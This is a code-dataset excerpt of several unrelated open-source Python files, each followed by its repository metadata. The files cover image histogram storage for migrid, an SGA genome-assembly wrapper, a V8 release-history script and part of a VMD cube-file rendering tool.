data_ent.shape))
result = True
__close_image_settings_file(logger, metafile)
return result
def get_image_file_preview_data(
logger,
base_path,
path,
filename,
):
"""Returns ndarray copy of preview file data"""
metafile = __open_image_settings_file(logger, base_path)
result = to_ndarray(logger, __get_image_file_preview_data(logger,
metafile, path, filename))
__close_image_settings_file(logger, metafile)
return result
def add_image_file_preview_histogram(
logger,
base_path,
path,
filename,
histogram,
):
"""Put *histogram* into a table array, created if non-existent"""
result = False
metafile = __open_image_settings_file(logger, base_path)
if metafile is not None:
histogram_group = __get_image_file_histogram_node(logger,
metafile)
image_filepath = os.path.join(path, filename)
title = 'Histogram for resized and rescaled preview data: %s' \
% image_filepath
name = image_filepath.replace('/', '|')
logger.debug('name: %s' % name)
logger.debug('title: %s' % title)
logger.debug('histogram: %s, %s' % (histogram.dtype,
str(histogram.shape)))
try:
histogram_ent = histogram_group.__getattr__(name)
histogram_ent[:] = histogram
except tables.exceptions.NoSuchNodeError:
histogram_ent = metafile['tables'
].create_array(histogram_group, name,
obj=histogram, title=title)
logger.debug('histogram_ent: %s, %s, %s'
% (histogram_ent.dtype, histogram_ent.shape,
histogram_ent))
result = True
__close_image_settings_file(logger, metafile)
return result
def get_image_file_preview_histogram(
logger,
base_path,
path,
filename,
):
"""Returns ndarray copy of preview file histogram"""
metafile = __open_image_settings_file(logger, base_path)
result = to_ndarray(logger,
__get_image_file_preview_histogram_data(logger,
metafile, path, filename))
__close_image_settings_file(logger, metafile)
return result
|
heromod/migrid
|
mig/shared/imagemetaio.py
|
Python
|
gpl-2.0
| 42,918
|
[
"Brian"
] |
aa9c031aa6961d1eb472f91d27738e2291c12dcffe0c19947a1ea46bc2b1d964
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import argparse
import re
import subprocess
def is_empty(fpath):
try:
return not (os.path.getsize(fpath) > 0)
except OSError:
pass
return True
if __name__ == '__main__':
# Arguments parsing
parser = argparse.ArgumentParser(description='')
# -i / --input_fastq
parser.add_argument('-i', '--input_fastq',
action='store',
metavar='FASTQ',
type=str,
required=True,
help='Input fastq file')
# --paired_end
parser.add_argument('--paired_end',
action='store_true',
help='Input fastq is made of '
'interleaved paired-end reads')
# -o / --output_contigs
parser.add_argument('-o', '--output_contigs',
action='store',
metavar='FASTA',
type=str,
default='contigs.fa',
help='Ouput contigs fasta file. '
'Default is ${default}s')
# --no_correction
parser.add_argument('--no_correction',
action = 'store_true',
help = 'Desactivate error correction')
# --sga_bin
parser.add_argument('--sga_bin',
action='store',
metavar='PATH',
type=str,
default='sga',
help='SGA bin path (by default sga is searched in $PATH)')
# --tmp_dir
parser.add_argument('--tmp_dir',
action='store',
metavar='DIR',
type=str,
default='/tmp',
help='Tmp directory. '
'Default is ${default}s')
# --cpu
parser.add_argument('--cpu',
action='store',
metavar='INT',
type=int,
default=3,
help='Max number of CPU to use. '
'Default is ${default}s')
#
args = parser.parse_args()
assembly_output_basename = 'assemble'
# Get input and output files absolute paths
input_filepath = os.path.realpath(args.input_fastq)
current_working_dir = os.getcwd()
if (args.output_contigs[0] == '/' or args.output_contigs[0] == '~'):
# output file was given using an absolute path
output_filepath = args.output_contigs
else:
# output file was given using a relative path
output_filepath = current_working_dir + '/' + args.output_contigs
# Mkdir tmp dir if need be
try:
if not os.path.exists(args.tmp_dir):
os.makedirs(args.tmp_dir)
except OSError:
sys.stderr.write("\nERROR: {0} tmp dir cannot be created\n\n".format(args.tmp_dir))
raise
# Change cwd to tmp dir
os.chdir(args.tmp_dir)
# Cleaning last assembly contigs
if os.path.exists(assembly_output_basename + '-contigs.fa'):
os.remove(assembly_output_basename + '-contigs.fa')
# Preprocessing
preprocess_output = 'preprocess_output.fq'
cmd_line = args.sga_bin + ' preprocess -v ' + input_filepath
cmd_line += ' -o ' + preprocess_output
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
if is_empty(preprocess_output):
sys.stdout.write('\nWARNING: sga preprocess cmd return an empty file\n')
exit(0)
## Error correction
error_corrected_output_basename = 'preprocess_output'
if not args.no_correction:
error_corrected_output_basename = 'error_corrected'
# Build the index that will be used for error correction
cmd_line = args.sga_bin + ' index -a sais' # ropebwt algo will only work for sequences < 200bp
cmd_line += ' -t ' + str(args.cpu) + ' --no-reverse '
cmd_line += preprocess_output
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
# Perform error correction
kmer_cutoff = 41
cmd_line = args.sga_bin + ' correct -k ' + str(kmer_cutoff)
cmd_line += ' --discard -x 2 -t ' + str(args.cpu)
#~ cmd_line += ' --discard --learn -t ' + str(args.cpu)
cmd_line += ' -o ' + error_corrected_output_basename + '.fq'
cmd_line += ' ' + preprocess_output
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
if is_empty(error_corrected_output_basename + '.fq'):
sys.stdout.write('\nWARNING: sga correct cmd return an empty file\n')
exit(0)
## Contig assembly
# Index the corrected data
cmd_line = args.sga_bin + ' index -a sais' # ropebwt algo will only work for sequences < 200bp
cmd_line += ' -t ' + str(args.cpu)
cmd_line += ' ' + error_corrected_output_basename + '.fq'
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
# Remove exact-match duplicates and reads with low-frequency k-mers
filtered_output = error_corrected_output_basename + '.filter.pass.fa'
min_kmer_coverage = 2
if args.no_correction:
min_kmer_coverage = 1
cmd_line = args.sga_bin + ' filter -x ' + str(min_kmer_coverage)
cmd_line += ' -t ' + str(args.cpu)
if not args.no_correction:
cmd_line += ' --homopolymer-check --low-complexity-check'
cmd_line += ' -o ' + filtered_output
cmd_line += ' ' + error_corrected_output_basename + '.fq'
sys.stdout.write('\nCMD: {0}\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
if is_empty(filtered_output):
sys.stdout.write('\nWARNING: sga filter cmd return an empty file\n')
exit(0)
# Merge simple, unbranched chains of vertices
fm_merge_overlap = 55
merged_output_basename = 'merged_output'
cmd_line = args.sga_bin + ' fm-merge -m ' + str(fm_merge_overlap)
cmd_line += ' -t ' + str(args.cpu) + ' -o ' + merged_output_basename + '.fa'
cmd_line += ' ' + filtered_output
sys.stdout.write('\nCMD: {0}\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
if is_empty(merged_output_basename + '.fa'):
sys.stdout.write('\nWARNING: sga fm-merge cmd return an empty file\n')
exit(0)
# Build an index of the merged sequences
cmd_line = args.sga_bin + ' index -d 1000000'
cmd_line += ' -t ' + str(args.cpu)
cmd_line += ' ' + merged_output_basename + '.fa'
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
# Remove any substrings that were generated from the merge process
cmd_line = args.sga_bin + ' rmdup'
cmd_line += ' -t ' + str(args.cpu)
cmd_line += ' ' + merged_output_basename + '.fa'
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
# Compute the structure of the string graph
min_overlap = fm_merge_overlap
cmd_line = args.sga_bin + ' overlap -m ' + str(min_overlap)
cmd_line += ' -t ' + str(args.cpu)
cmd_line += ' ' + merged_output_basename + '.rmdup.fa'
sys.stdout.write('\nCMD: {0}\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
# Perform the contig assembly without bubble popping
assembly_output_basename = 'assemble'
assembly_contigs_filename = assembly_output_basename + '-contigs.fa'
cmd_line = args.sga_bin + ' assemble -m ' + str(min_overlap)
#~ cmd_line += ' -b 3 -d 0.03 -g 0.01 '
cmd_line += ' -b 0'
#~ cmd_line += ' -r 10'
#~ cmd_line += ' --max-edges 10000 -x 10 -l 100 '
cmd_line += ' -x 10 -l 100 '
cmd_line += ' -o ' + assembly_output_basename
cmd_line += ' ' + merged_output_basename + '.rmdup.asqg.gz'
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
# Scaffolding
assembly_scaffolds_filename = assembly_output_basename + '-scaffolds.fa'
if args.paired_end:
cmd_line = 'bwa index ' + assembly_contigs_filename
#~ cmd_line
## Final post-processing
assembly_output_filename = assembly_output_basename
if args.paired_end:
assembly_output_filename += '-scaffolds.fa'
else:
assembly_output_filename += '-contigs.fa'
#~ cmd_line = 'cp ' + assembly_output_filename + ' '
cmd_line = 'cp ' + assembly_contigs_filename + ' '
cmd_line += output_filepath
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
exit(0)
|
bonsai-team/matam
|
scripts/sga_assemble.py
|
Python
|
agpl-3.0
| 8,860
|
[
"BWA"
] |
ba83fd97ed60d6778d9e93012efb773327ca7d66201c84900abd79238e72e0e1
|
#!/usr/bin/env python
# Copyright 2014 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This script retrieves the history of all V8 branches and trunk revisions and
# their corresponding Chromium revisions.
# Requires a chromium checkout with branch heads:
# gclient sync --with_branch_heads
# gclient fetch
import argparse
import csv
import itertools
import json
import os
import re
import sys
from common_includes import *
CONFIG = {
"BRANCHNAME": "retrieve-v8-releases",
"PERSISTFILE_BASENAME": "/tmp/v8-releases-tempfile",
}
# Expression for retrieving the bleeding edge revision from a commit message.
PUSH_MSG_SVN_RE = re.compile(r".* \(based on bleeding_edge revision r(\d+)\)$")
PUSH_MSG_GIT_RE = re.compile(r".* \(based on ([a-fA-F0-9]+)\)$")
# Expression for retrieving the merged patches from a merge commit message
# (old and new format).
MERGE_MESSAGE_RE = re.compile(r"^.*[M|m]erged (.+)(\)| into).*$", re.M)
CHERRY_PICK_TITLE_GIT_RE = re.compile(r"^.* \(cherry\-pick\)\.?$")
# New git message for cherry-picked CLs. One message per line.
MERGE_MESSAGE_GIT_RE = re.compile(r"^Merged ([a-fA-F0-9]+)\.?$")
# Expression for retrieving reverted patches from a commit message (old and
# new format).
ROLLBACK_MESSAGE_RE = re.compile(r"^.*[R|r]ollback of (.+)(\)| in).*$", re.M)
# New git message for reverted CLs. One message per line.
ROLLBACK_MESSAGE_GIT_RE = re.compile(r"^Rollback of ([a-fA-F0-9]+)\.?$")
# Expression for retrieving the code review link.
REVIEW_LINK_RE = re.compile(r"^Review URL: (.+)$", re.M)
# Expression with three versions (historical) for extracting the v8 revision
# from the chromium DEPS file.
DEPS_RE = re.compile(r"""^\s*(?:["']v8_revision["']: ["']"""
"""|\(Var\("googlecode_url"\) % "v8"\) \+ "\/trunk@"""
"""|"http\:\/\/v8\.googlecode\.com\/svn\/trunk@)"""
"""([^"']+)["'].*$""", re.M)
# Expression to pick tag and revision for bleeding edge tags. To be used with
# output of 'svn log'.
BLEEDING_EDGE_TAGS_RE = re.compile(
r"A \/tags\/([^\s]+) \(from \/branches\/bleeding_edge\:(\d+)\)")
def SortBranches(branches):
"""Sort branches with version number names."""
return sorted(branches, key=SortingKey, reverse=True)
def FilterDuplicatesAndReverse(cr_releases):
"""Returns the chromium releases in reverse order filtered by v8 revision
duplicates.
cr_releases is a list of [cr_rev, v8_rev] reverse-sorted by cr_rev.
"""
last = ""
result = []
for release in reversed(cr_releases):
if last == release[1]:
continue
last = release[1]
result.append(release)
return result
def BuildRevisionRanges(cr_releases):
"""Returns a mapping of v8 revision -> chromium ranges.
The ranges are comma-separated, each range has the form R1:R2. The newest
entry is the only one of the form R1, as there is no end range.
cr_releases is a list of [cr_rev, v8_rev] reverse-sorted by cr_rev.
cr_rev either refers to a chromium svn revision or a chromium branch number.
"""
range_lists = {}
cr_releases = FilterDuplicatesAndReverse(cr_releases)
# Visit pairs of cr releases from oldest to newest.
for cr_from, cr_to in itertools.izip(
cr_releases, itertools.islice(cr_releases, 1, None)):
# Assume the chromium revisions are all different.
assert cr_from[0] != cr_to[0]
# TODO(machenbach): Subtraction is not git friendly.
ran = "%s:%d" % (cr_from[0], int(cr_to[0]) - 1)
# Collect the ranges in lists per revision.
range_lists.setdefault(cr_from[1], []).append(ran)
# Add the newest revision.
if cr_releases:
range_lists.setdefault(cr_releases[-1][1], []).append(cr_releases[-1][0])
# Stringify and comma-separate the range lists.
return dict((rev, ", ".join(ran)) for rev, ran in range_lists.iteritems())
def MatchSafe(match):
if match:
return match.group(1)
else:
return ""
class Preparation(Step):
MESSAGE = "Preparation."
def RunStep(self):
self.CommonPrepare()
self.PrepareBranch()
class RetrieveV8Releases(Step):
MESSAGE = "Retrieve all V8 releases."
def ExceedsMax(self, releases):
return (self._options.max_releases > 0
and len(releases) > self._options.max_releases)
def GetBleedingEdgeGitFromPush(self, title):
return MatchSafe(PUSH_MSG_GIT_RE.match(title))
def GetMergedPatches(self, body):
patches = MatchSafe(MERGE_MESSAGE_RE.search(body))
if not patches:
patches = MatchSafe(ROLLBACK_MESSAGE_RE.search(body))
if patches:
# Indicate reverted patches with a "-".
patches = "-%s" % patches
return patches
def GetMergedPatchesGit(self, body):
patches = []
for line in body.splitlines():
patch = MatchSafe(MERGE_MESSAGE_GIT_RE.match(line))
if patch:
patches.append(patch)
patch = MatchSafe(ROLLBACK_MESSAGE_GIT_RE.match(line))
if patch:
patches.append("-%s" % patch)
return ", ".join(patches)
def GetReleaseDict(
self, git_hash, bleeding_edge_rev, bleeding_edge_git, branch, version,
patches, cl_body):
revision = self.GetCommitPositionNumber(git_hash)
return {
# The cr commit position number on the branch.
"revision": revision,
# The git revision on the branch.
"revision_git": git_hash,
# The cr commit position number on master.
"bleeding_edge": bleeding_edge_rev,
# The same for git.
"bleeding_edge_git": bleeding_edge_git,
# The branch name.
"branch": branch,
# The version for displaying in the form 3.26.3 or 3.26.3.12.
"version": version,
# The date of the commit.
"date": self.GitLog(n=1, format="%ci", git_hash=git_hash),
# Merged patches if available in the form 'r1234, r2345'.
"patches_merged": patches,
# Default for easier output formatting.
"chromium_revision": "",
# Default for easier output formatting.
"chromium_branch": "",
# Link to the CL on code review. Trunk pushes are not uploaded, so this
# field will be populated below with the recent roll CL link.
"review_link": MatchSafe(REVIEW_LINK_RE.search(cl_body)),
# Link to the commit message on google code.
"revision_link": ("https://code.google.com/p/v8/source/detail?r=%s"
% revision),
}
def GetRelease(self, git_hash, branch):
self.ReadAndPersistVersion()
base_version = [self["major"], self["minor"], self["build"]]
version = ".".join(base_version)
body = self.GitLog(n=1, format="%B", git_hash=git_hash)
patches = ""
if self["patch"] != "0":
version += ".%s" % self["patch"]
if CHERRY_PICK_TITLE_GIT_RE.match(body.splitlines()[0]):
patches = self.GetMergedPatchesGit(body)
else:
patches = self.GetMergedPatches(body)
title = self.GitLog(n=1, format="%s", git_hash=git_hash)
bleeding_edge_git = self.GetBleedingEdgeGitFromPush(title)
bleeding_edge_position = ""
if bleeding_edge_git:
bleeding_edge_position = self.GetCommitPositionNumber(bleeding_edge_git)
# TODO(machenbach): Add the commit position number.
return self.GetReleaseDict(
git_hash, bleeding_edge_position, bleeding_edge_git, branch, version,
patches, body), self["patch"]
def GetReleasesFromMaster(self):
# TODO(machenbach): Implement this in git as soon as we tag again on
# master.
# tag_text = self.SVN("log https://v8.googlecode.com/svn/tags -v
# --limit 20")
# releases = []
# for (tag, revision) in re.findall(BLEEDING_EDGE_TAGS_RE, tag_text):
# git_hash = self.vc.SvnGit(revision)
# Add bleeding edge release. It does not contain patches or a code
# review link, as tags are not uploaded.
# releases.append(self.GetReleaseDict(
# git_hash, revision, git_hash, self.vc.MasterBranch(), tag, "", ""))
return []
def GetReleasesFromBranch(self, branch):
self.GitReset(self.vc.RemoteBranch(branch))
if branch == self.vc.MasterBranch():
return self.GetReleasesFromMaster()
releases = []
try:
for git_hash in self.GitLog(format="%H").splitlines():
if VERSION_FILE not in self.GitChangedFiles(git_hash):
continue
if self.ExceedsMax(releases):
break # pragma: no cover
if not self.GitCheckoutFileSafe(VERSION_FILE, git_hash):
break # pragma: no cover
release, patch_level = self.GetRelease(git_hash, branch)
releases.append(release)
# Follow branches only until their creation point.
# TODO(machenbach): This omits patches if the version file wasn't
# manipulated correctly. Find a better way to detect the point where
# the parent of the branch head leads to the trunk branch.
if branch != self.vc.CandidateBranch() and patch_level == "0":
break
# Allow Ctrl-C interrupt.
except (KeyboardInterrupt, SystemExit): # pragma: no cover
pass
# Clean up checked-out version file.
self.GitCheckoutFileSafe(VERSION_FILE, "HEAD")
return releases
def RunStep(self):
self.GitCreateBranch(self._config["BRANCHNAME"])
branches = self.vc.GetBranches()
releases = []
if self._options.branch == 'recent':
# Get only recent development on trunk, beta and stable.
if self._options.max_releases == 0: # pragma: no cover
self._options.max_releases = 10
beta, stable = SortBranches(branches)[0:2]
releases += self.GetReleasesFromBranch(stable)
releases += self.GetReleasesFromBranch(beta)
releases += self.GetReleasesFromBranch(self.vc.CandidateBranch())
releases += self.GetReleasesFromBranch(self.vc.MasterBranch())
elif self._options.branch == 'all': # pragma: no cover
# Retrieve the full release history.
for branch in branches:
releases += self.GetReleasesFromBranch(branch)
releases += self.GetReleasesFromBranch(self.vc.CandidateBranch())
releases += self.GetReleasesFromBranch(self.vc.MasterBranch())
else: # pragma: no cover
# Retrieve history for a specified branch.
assert self._options.branch in (branches +
[self.vc.CandidateBranch(), self.vc.MasterBranch()])
releases += self.GetReleasesFromBranch(self._options.branch)
self["releases"] = sorted(releases,
key=lambda r: SortingKey(r["version"]),
reverse=True)
class SwitchChromium(Step):
MESSAGE = "Switch to Chromium checkout."
def RunStep(self):
cwd = self._options.chromium
# Check for a clean workdir.
if not self.GitIsWorkdirClean(cwd=cwd): # pragma: no cover
self.Die("Workspace is not clean. Please commit or undo your changes.")
# Assert that the DEPS file is there.
if not os.path.exists(os.path.join(cwd, "DEPS")): # pragma: no cover
self.Die("DEPS file not present.")
class UpdateChromiumCheckout(Step):
MESSAGE = "Update the checkout and create a new branch."
def RunStep(self):
cwd = self._options.chromium
self.GitCheckout("master", cwd=cwd)
self.GitPull(cwd=cwd)
self.GitCreateBranch(self.Config("BRANCHNAME"), cwd=cwd)
def ConvertToCommitNumber(step, revision):
# Simple check for git hashes.
if revision.isdigit() and len(revision) < 8:
return revision
return step.GetCommitPositionNumber(
revision, cwd=os.path.join(step._options.chromium, "v8"))
class RetrieveChromiumV8Releases(Step):
MESSAGE = "Retrieve V8 releases from Chromium DEPS."
def RunStep(self):
cwd = self._options.chromium
releases = filter(
lambda r: r["branch"] in [self.vc.CandidateBranch(),
self.vc.MasterBranch()],
self["releases"])
if not releases: # pragma: no cover
print "No releases detected. Skipping chromium history."
return True
# Update v8 checkout in chromium.
self.GitFetchOrigin(cwd=os.path.join(cwd, "v8"))
oldest_v8_rev = int(releases[-1]["revision"])
cr_releases = []
try:
for git_hash in self.GitLog(
format="%H", grep="V8", cwd=cwd).splitlines():
if "DEPS" not in self.GitChangedFiles(git_hash, cwd=cwd):
continue
if not self.GitCheckoutFileSafe("DEPS", git_hash, cwd=cwd):
break # pragma: no cover
deps = FileToText(os.path.join(cwd, "DEPS"))
match = DEPS_RE.search(deps)
if match:
cr_rev = self.GetCommitPositionNumber(git_hash, cwd=cwd)
if cr_rev:
v8_rev = ConvertToCommitNumber(self, match.group(1))
cr_releases.append([cr_rev, v8_rev])
# Stop after reaching beyond the last v8 revision we want to update.
# We need a small buffer for possible revert/reland frenzies.
# TODO(machenbach): Subtraction is not git friendly.
if int(v8_rev) < oldest_v8_rev - 100:
break # pragma: no cover
# Allow Ctrl-C interrupt.
except (KeyboardInterrupt, SystemExit): # pragma: no cover
pass
# Clean up.
self.GitCheckoutFileSafe("DEPS", "HEAD", cwd=cwd)
# Add the chromium ranges to the v8 trunk and bleeding_edge releases.
all_ranges = BuildRevisionRanges(cr_releases)
releases_dict = dict((r["revision"], r) for r in releases)
for revision, ranges in all_ranges.iteritems():
releases_dict.get(revision, {})["chromium_revision"] = ranges
# TODO(machenbach): Unify common code with method above.
class RietrieveChromiumBranches(Step):
MESSAGE = "Retrieve Chromium branch information."
def RunStep(self):
cwd = self._options.chromium
trunk_releases = filter(lambda r: r["branch"] == self.vc.CandidateBranch(),
self["releases"])
if not trunk_releases: # pragma: no cover
print "No trunk releases detected. Skipping chromium history."
return True
oldest_v8_rev = int(trunk_releases[-1]["revision"])
# Filter out irrelevant branches.
branches = filter(lambda r: re.match(r"branch-heads/\d+", r),
self.GitRemotes(cwd=cwd))
# Transform into pure branch numbers.
branches = map(lambda r: int(re.match(r"branch-heads/(\d+)", r).group(1)),
branches)
branches = sorted(branches, reverse=True)
cr_branches = []
try:
for branch in branches:
if not self.GitCheckoutFileSafe("DEPS",
"branch-heads/%d" % branch,
cwd=cwd):
break # pragma: no cover
deps = FileToText(os.path.join(cwd, "DEPS"))
match = DEPS_RE.search(deps)
if match:
v8_rev = ConvertToCommitNumber(self, match.group(1))
cr_branches.append([str(branch), v8_rev])
# Stop after reaching beyond the last v8 revision we want to update.
# We need a small buffer for possible revert/reland frenzies.
# TODO(machenbach): Subtraction is not git friendly.
if int(v8_rev) < oldest_v8_rev - 100:
break # pragma: no cover
# Allow Ctrl-C interrupt.
except (KeyboardInterrupt, SystemExit): # pragma: no cover
pass
# Clean up.
self.GitCheckoutFileSafe("DEPS", "HEAD", cwd=cwd)
# Add the chromium branches to the v8 trunk releases.
all_ranges = BuildRevisionRanges(cr_branches)
trunk_dict = dict((r["revision"], r) for r in trunk_releases)
for revision, ranges in all_ranges.iteritems():
trunk_dict.get(revision, {})["chromium_branch"] = ranges
class CleanUp(Step):
MESSAGE = "Clean up."
def RunStep(self):
self.GitCheckout("master", cwd=self._options.chromium)
self.GitDeleteBranch(self.Config("BRANCHNAME"), cwd=self._options.chromium)
self.CommonCleanup()
class WriteOutput(Step):
MESSAGE = "Print output."
def Run(self):
if self._options.csv:
with open(self._options.csv, "w") as f:
writer = csv.DictWriter(f,
["version", "branch", "revision",
"chromium_revision", "patches_merged"],
restval="",
extrasaction="ignore")
for release in self["releases"]:
writer.writerow(release)
if self._options.json:
with open(self._options.json, "w") as f:
f.write(json.dumps(self["releases"]))
if not self._options.csv and not self._options.json:
print self["releases"] # pragma: no cover
class Releases(ScriptsBase):
def _PrepareOptions(self, parser):
parser.add_argument("-b", "--branch", default="recent",
help=("The branch to analyze. If 'all' is specified, "
"analyze all branches. If 'recent' (default) "
"is specified, track beta, stable and trunk."))
parser.add_argument("-c", "--chromium",
help=("The path to your Chromium src/ "
"directory to automate the V8 roll."))
parser.add_argument("--csv", help="Path to a CSV file for export.")
parser.add_argument("-m", "--max-releases", type=int, default=0,
help="The maximum number of releases to track.")
parser.add_argument("--json", help="Path to a JSON file for export.")
def _ProcessOptions(self, options): # pragma: no cover
return True
def _Config(self):
return {
"BRANCHNAME": "retrieve-v8-releases",
"PERSISTFILE_BASENAME": "/tmp/v8-releases-tempfile",
}
def _Steps(self):
return [
Preparation,
RetrieveV8Releases,
SwitchChromium,
UpdateChromiumCheckout,
RetrieveChromiumV8Releases,
RietrieveChromiumBranches,
CleanUp,
WriteOutput,
]
if __name__ == "__main__": # pragma: no cover
sys.exit(Releases().Run())
|
mxOBS/deb-pkg_trusty_chromium-browser
|
v8/tools/push-to-trunk/releases.py
|
Python
|
bsd-3-clause
| 18,018
|
[
"VisIt"
] |
81ded2318ae66a47c768c547825f984593e8e1a5292c1fa38464a3b26219ebec
|
#!/usr/bin/env python
# MIT License
#
# Copyright (c) 2017 Francesco Evangelista
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import print_function
import argparse
import sys
import re
import subprocess
import os
import datetime
from os import listdir, environ
from os.path import isfile, join
vmd_cube_help = """vmd_cube is a script to render cube files with vmd.
To generate cube files with Psi4 add the command cubeprop() at the end of your input file."""
vmd_exe = ""
vmd_script_name = "vmd_mo_script.vmd"
vmd_template = """#
# VMD script to plot MOs from cube files
#
# Load the molecule and change the atom style
mol load cube PARAM_CUBEFILE.cube
mol modcolor 0 PARAM_CUBENUM Element
mol modstyle 0 PARAM_CUBENUM Licorice 0.110000 10.000000 10.000000
#mol modstyle 0 PARAM_CUBENUM CPK 0.400000 0.40000 30.000000 16.000000
# Define the material
material change ambient Opaque 0.310000
material change diffuse Opaque 0.720000
material change specular Opaque 0.500000
material change shininess Opaque 0.480000
material change opacity Opaque 1.000000
material change outline Opaque 0.000000
material change outlinewidth Opaque 0.000000
material change transmode Opaque 0.000000
material change specular Opaque 0.750000
material change ambient EdgyShiny 0.310000
material change diffuse EdgyShiny 0.720000
material change shininess EdgyShiny 1.0000
material change opacity EdgyShiny PARAM_OPACITY
# Customize atom colors
color Element C silver
color Element H white
# Rotate and translate the molecule
rotate x by PARAM_RX
rotate y by PARAM_RY
rotate z by PARAM_RZ
translate by PARAM_TX PARAM_TY PARAM_TZ
scale by PARAM_SCALE
# Eliminate the axis and perfect the view
axes location Off
display projection Orthographic
display depthcue off
display resize PARAM_IMAGEW PARAM_IMAGEH
color Display Background white"""
vmd_template_surface = """#
# Add the surfaces
mol color ColorID PARAM_SURF1ID
mol representation Isosurface PARAM_ISOVALUE1 0 0 0 1 1
mol selection all
mol material EdgyShiny
mol addrep PARAM_CUBENUM
mol color ColorID PARAM_SURF2ID
mol representation Isosurface PARAM_ISOVALUE2 0 0 0 1 1
mol selection all
mol material EdgyShiny
mol addrep PARAM_CUBENUM
"""
vmd_template_interactive = """#
# Disable rendering
mol off PARAM_CUBENUM
"""
vmd_template_render = """
# Render
render TachyonInternal PARAM_CUBEFILE.tga
mol delete PARAM_CUBENUM
"""
vmd_template_rotate = """
light 1 off
light 0 rot y 30.0
light 0 rot x -30.0
"""
default_path = os.getcwd()
# Default parameters
options = {"SURF1ID" : [None,"Surface1 Color Id"],
"SURF2ID" : [None,"Surface2 Color Id"],
"ISOVALUE1" : [None,"Isosurface1 Value"],
"ISOVALUE2" : [None,"Isosurface2 Value"],
"RX" : [None,"X-axis Rotation"],
"RY" : [None,"Y-axis Rotation"],
"RZ" : [None,"Z-axis Rotation"],
"TX" : [None,"X-axis Translation"],
"TY" : [None,"Y-axis Translation"],
"TZ" : [None,"Z-axis Translation"],
"OPACITY" : [None,"Opacity"],
"CUBEDIR" : [None,"Cubefile Directory"],
"SCALE" : [None,"Scaling Factor"],
"MONTAGE" : [None,"Montage"],
"LABEL_MOS" : [None,"Label MOs"],
"FONTSIZE" : [None,"Font size"],
"IMAGEW" : [None,"Image width"],
"IMAGEH" : [None,"Image height"],
"VMDPATH" : [None,"VMD Path"],
"INTERACTIVE": [None,"Interactive Mode"],
"GZIP" : [None,"Gzip Cube Files"]}
def which(program):
import os
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
def multigsub(subs,str):
for k,v in subs.items():
str = re.sub(k,v,str)
return str
def find_vmd(options):
if environ['VMDPATH']:
vmdpath = environ['VMDPATH']
vmdpath = multigsub({" " : r"\ "},vmdpath)
options["VMDPATH"][0] = vmdpath
else:
print("Please set the VMDPATH environmental variable to the path of VMD.")
exit(1)
def save_setup_command(argv):
file_name = join(default_path, 'vmd_cube_command')
f = open(file_name, 'w')
f.write('# setup command was executed '+datetime.datetime.now().strftime("%d-%B-%Y %H:%M:%S"+"\n"))
f.write(" ".join(argv[:])+"\n")
f.close()
def read_options(options):
parser = argparse.ArgumentParser(description=vmd_cube_help)
parser.add_argument('data', metavar='<cubefile dir>', type=str, nargs='?',default=".",
help='The directory containing the cube files.')
parser.add_argument('--color1', metavar='<integer>', type=int, nargs='?',default=3,
help='the color ID of surface 1 (integer, default = 3)')
parser.add_argument('--color2', metavar='<integer>', type=int, nargs='?',default=23,
help='the color ID of surface 2 (integer, default = 23)')
parser.add_argument('--iso', metavar='<isovalue>', type=float, nargs='?',default=0.05,
help='the isosurface value (float, default = 0.05)')
parser.add_argument('--rx', metavar='<angle>', type=float, nargs='?',default=30.0,
help='the x-axis rotation angle (float, default = 30.0)')
parser.add_argument('--ry', metavar='<angle>', type=float, nargs='?',default=40.0,
help='the y-axis rotation angle (float, default = 40.0)')
parser.add_argument('--rz', metavar='<angle>', type=float, nargs='?',default=15.0,
help='the z-axis rotation angle (float, default = 15.0)')
parser.add_argument('--tx', metavar='<length>', type=float, nargs='?',default=0.0,
help='the x-axis translation (float, default = 0.0)')
parser.add_argument('--ty', metavar='<length>', type=float, nargs='?',default=0.0,
help='the y-axis translation (float, default = 0.0)')
parser.add_argument('--tz', metavar='<length>', type=float, nargs='?',default=0.0,
help='the z-axis translation (float, default = 0.0)')
parser.add_argument('--opacity', metavar='<opacity>', type=float, nargs='?',default=1.0,
help='opacity of the isosurface (float, default = 1.0)')
